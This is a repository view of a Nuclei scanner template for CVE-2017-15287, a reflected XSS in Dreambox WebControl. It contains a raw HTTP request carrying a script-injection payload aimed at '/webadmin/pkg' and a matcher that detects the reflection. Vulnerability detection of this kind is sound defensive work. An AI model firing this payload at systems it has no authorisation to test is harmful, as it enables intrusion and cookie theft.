daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2017/CVE-2017-15287.yaml

29 lines
936 B
YAML
Raw Normal View History

Create dreambox-xss (#3535) * Create dreambox-xss.yaml * Create dreambox-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-01-15 20:35:33 +00:00
id: CVE-2017-15287
info:
name: Dreambox WebControl Reflected XSS
author: pikpikcu
severity: medium
tags: cve,cve2017,xss,dreambox
Auto Generated CVE annotations [Sat Jan 15 20:36:52 UTC 2022] :robot:
2022-01-15 20:36:52 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-15287
cwe-id: CWE-79
description: "There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI."
reference:
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
Create dreambox-xss (#3535) * Create dreambox-xss.yaml * Create dreambox-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-01-15 20:35:33 +00:00
requests:
- raw:
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
- 'Unknown command: <script>alert(document.cookie)</script>'